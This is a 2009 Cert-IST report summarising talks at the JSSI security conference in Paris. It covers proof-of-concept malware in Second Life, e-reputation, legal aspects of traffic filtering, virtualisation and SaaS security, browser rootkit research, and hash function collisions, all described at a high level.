Report for the 2009 JSSI meeting

Date : April 03, 2009

The 2009 JSSI meeting ("Journée de la Sécurité des Systèmes d'Information" - organized by the OSSIR association) was held on March 17th, 2009 in Paris. The Cert-IST attended the conference, which gathered hundreds of participants. Presentations were focused  on the theme: "The new faces of computer insecurity". The presentations covered a wide range of topics including the following ones: SAAS (Software As A Service) security solutions, reputation management in a Web 2.0 open and communicating environment, and security of virtual worlds.

The talks were deep and kept up the pace all day long. This made the day very interesting and profitable.

This report does not present the technical details of each presentation, and focuses on the major ideas of interest for the Cert-IST community. Materials are available on the official site of the JSSI-2009.

 

Malware on Second Life: myth or reality? (F. Paget - McAfee)

Mr F. Paget already gave a presentation about the security of the virtual worlds in 2008 during the EICAR conference. This time he focussed to investigate whether it is possible to implement malware in virtual worlds similarly to the ones we already know in the "real life".

As expected, the answer is "yes", and several demonstration programs were presented to illustrate it:

  • The spammer glass: This is a virtual object that looks like a glass, which, if picked up by an avatar (a character representing a user in the virtual world), begins to send spam emails into the real world. It is therefore an example of a Trojan designed for the virtual worlds (a fake virtual object) that carries a nuisance (spam) interacting with the real world.
  • The worm: To demonstrate the possibility of a self-replicating code in a virtual world, he developed a virtual object which instantly self-replicate when touched by an avatar.
  • The virus: It is also possible to design malicious objects that attempt to infect other objects in the virtual world. The experiments done by the presenter on this topic concluded that it is currently not possible to build a fully autonomous virus: the (unintentional) collaboration of an avatar (who manipulates the infected object) is required to propagate the infection.
  • Theft and phishing: The last prototype presented shows that it would be possible to build a Trojan that steals the virtual money carried by an avatar. A phishing like scenario was set up to convince the avatar to use this Trojan.

 Overall, these researches show that virtual worlds are not immune from the virus threat we already know in the real world.

 

The challenges of e-reputation (S. Koch - Intelligentzia.net)

Companies have always had to pay careful attention to preserve their image (reputation) and to avoid the possible leakages that may affect their informational assets.

But the increase usage of the Web 2.0 e-world and the profusion of knowledge sharing tools (forums, blogs and social networks) significantly increase these risks. These tools are widely present on the Internet and are used by a growing number of employees. By posting a message in a blog or a forum, an employee may harm the reputation of the company or transmit sensitive information.

The speaker highlighted the opposition which exists between the "closed" world (de facto model for a company), and the "open and free" world ("Internet-like" model). When browsing the Internet, the employee is immersed in a totally different environment, and may adopt totally irrational behaviours compared with the rules implied by its company Code of conduct.

Koch gave many examples of the risks induced by Web 2.0 Internet environments ("profiling", disinformation, etc…).  He mentioned that Internet users:

  • Often behave as consumers rather than as rational and wise persons. To access what he wants, the consumer is ready to accept terms which seems totally unreasonable to a rational person (i.e. the Facebook terms which required abandoning any right of ownership to Facebook over what is published on Facebook).
  • Do not realize that their publications can have a large audience and that once published the information is more manageable.

Rather than prohibiting the use of these tools, the speaker recommends promoting awareness and educating employees on the proper usage of the Web 2.0 tools.

 

Data communication filtering and monitoring: Yes we can!

This presentation aims at answering the question: is it legal for a company to filter and log communication data?

The presenter first described the French laws related to the IT activities and showed that there is no concrete answer for such a question in the laws. For example, the LCEN law (Loi pour la Confiance dans l'Economie Numérique) was published in 2004 but we are still waiting for the decrees which will provide the concrete measures that must be enforced.

Despite this legal limbo the speaker explained that it is very important (for companies) to filter and log, because not doing so will be considered as a negligence. He therefore recommended writing in an internal charter, the "Acceptable Use Policy" and the monitoring and filtering rules. It is important that the charter stays in line with the current technologies and covers issues such as user mobility and web 2.0. He developed (and promoted) a model for such charters which he called a "4G charter" as they cover 4 axis(Refer to the presentation material for further details).

If these matters are not entirely new and have already been covered; e.g. see the presentation [2] mentioned in the Cert-IST report for JSSI 2007), it is interesting to note that:

  • The speech is now very clear: "A company MUST apply filtering and logging on data communication".
  • There are now new concerns to take into account, such as evidences preservation (what steps must be taken to ensure the integrity of the evidences collected).

 

Virtualization and Security (N. Ruff - EADS)

The presentation focused on the security of VMware environments because, according to a recent study published by Forrester in 2009, VMware is the leader on the virtualization market segment (98% market share) far ahead from Microsoft, and Citrix / Xen. It is also the more mature environment in terms of stability and reliability. The speaker presented an analysis that covers all the categories of vulnerabilities which could be found in virtualized environments. We will only report here the facts we found the most significant.

 

The major risk is environmental

The major source of problems when migrating to a virtualized environment is not the computer itself but the production environment:

  • The existing monitoring tools could fail when addressing virtualised computers.
  • The existing procedures (backups, recovery plans, etc ...) could require adjustments.
  • The administrator of the server hosting virtualized systems becomes a super user that controls all of the servers.

Note: For such risks, the speaker  qualified them as "human risks", but we have adopted the term "environmental risks" which have a broader meaning.

This environmental aspect is very important and should not be overlooked. Several guides exist to take into account these aspects when migrating to a virtualised environment (e.g. the NIST guides or the VMware trainings).

 

Virtualization introduces a critical resource: the host system
When many servers are virtualized on a single host system, this host system becomes a critical resource. Any downtime on the host system impacts all the virtualized hosts. Any change done on the host system (e.g. applying a security patch) becomes a risky operation.

 

The security level of a virtualized environment is always lower than the security level of the equivalent real systems.

From a theoretical point of view virtualized environment introduces an additional layer in the IT architecture: the host system that hosts the virtualized servers. This layer leads to potential vulnerabilities which increase the security exposure of the virtualized environment. That approach tries to demonstrate that a virtualized architecture cannot be more secure than the equivalent real systems.

 

Security of ASP / SAAS platforms (Y. Allain - Opale-securite.com)

This presentation evaluates the security of the SAAS ("Software As A Service".  Also known as ASP: Application Service Provider) platforms. The principle of a SAAS solution is that the service is not implemented by a piece of software sold to the company: it is available through a web interface on the website of the supplier.

The speaker explained that the level of security for SAAS solutions is often not high enough.

But he also thinks that SAAS solutions provide a real advantage for companies in some business sectors.  He gave as examples the case of the accounts management for multinational companies and the sales force management. Rejecting SAAS (because of its security weaknesses) is thus probably not appropriate.

Based on the experience he had when evaluating SAAS security, the speaker recommends to:

  • Be pragmatic.
  • Work with transparency with SAAS provider.
  • Include legal clauses in SAAS contracts.
  • Perform penetration testing.

 

Two third of the SAAS applications assessed had significant security weaknesses. In particular:

  • The security features provided are often weak. For example, the access control is commonly achieved using a simple "Login / Password" mechanism. This authentication method is very weak in comparison with the mechanism that is usually put in place for remote access to corporate resources ( e.g. strong authentication through "token" for VPN access).
  • A significant part of the SAAS suppliers have a low maturity in the area of IT security.
  • Most of the supplier effort, in the area of security, is put on buying infrastructure equipments dedicated to security (e.g. firewalls). On the other hand big security issues have been found during tests in some of the web applications used by SAAS.  Spending less money on hardware and more on application security should be a large benefit for SAAS security.

 

Web browser rootkits (C. Devaux and J. Lenoir – Sogeti)

Note: This talk has already been presented during Hack.Lu 2008 and Microsoft TechDays 2009 conferences.

This is a presentation of a study done in the Sogeti ESEC Research Division. The aim of this study was to investigate the possibility of inserting a rootkit into a web browser. Two prototypes have been developed as demonstrations:

  • A rootkit for Firefox. It is a malicious Firefox extension (an "xpi" file) that the user inadvertently installs (social engineering attack). This extension is invisible, uses the primitives available in Firefox (XPCOM) to steal passwords and cookies, and dialogs with Internet via standard Javascript primitives (XMLHttpRequest). This rootkit highlights a major flaw in Firefox extensions: no mechanism exists to limit the actions that can be performed by a malicious extension. Note: In 2006, the Cert-IST has published an article about the dangers induced by the Firefox extensions.
  • A rootkit for Internet Explorer. The rootkit uses already known techniques to inject itself into the Internet Explorer process. This means that the rootkit is not a BHO (Browser Helper Object) and run by patching the core IE process. The BHO approach was analysed as a possible way to implement a rootkit, but was finally discarded (see presentation material for further details). One interesting aspect of this rootkit is that it creates a hidden tab in Internet Explorer and corrupt IE internal caches to increase the privileges granted to this hidden tab. Once this is achieved, the tab is used to easily implement various features of the rootkit.

Note: The demonstration of the IE rootkit was performed on Windows XP, not on Vista (which has additional security features such as the "protected mode").

 

Hash functions, a fashionable subject (T. Peyrin - ingenico.com)

This presentation explained in details the hash functions (from the old MD4 to the upcoming SHA-3) and gave an history about their vulnerabilities.

The speaker first explained that all these algorithms are based on a common architecture. That could explain the fact that these algorithms have been "broken" (at least in theory) one after the other since 2004 (refer to the article "Cryptographic weaknesses in MD5 and SHA-1" published by the Cert-IST in August 2004).

The MD5 vulnerability has been first spotted in 1993 but it took until 2004 (and the publication of results by Chinese researchers) for a real MD5 collision to be exhibited. It is now possible to create MD5, SHA-0 and SHA-1 collisions with limited computing power. And if SHA-2 collisions have not yet been found, the search algorithms now available will probably "break" the algorithm in the 3 coming years. A contest has been launched by the US NIST to propose a new algorithm to replace SHA-2. That new algorithm will be named SHA-3 and should be operational in 2012.

Finally, the speaker commented the recent attacks against digital certificates based on MD5 (see our VulnCoord-2008.040 message published in December 2008). These attacks do no bring any novelty (from a cryptographic point of view), but show once again that the MD5 algorithm is now really too weak.

 

Previous Previous Next Next Print Print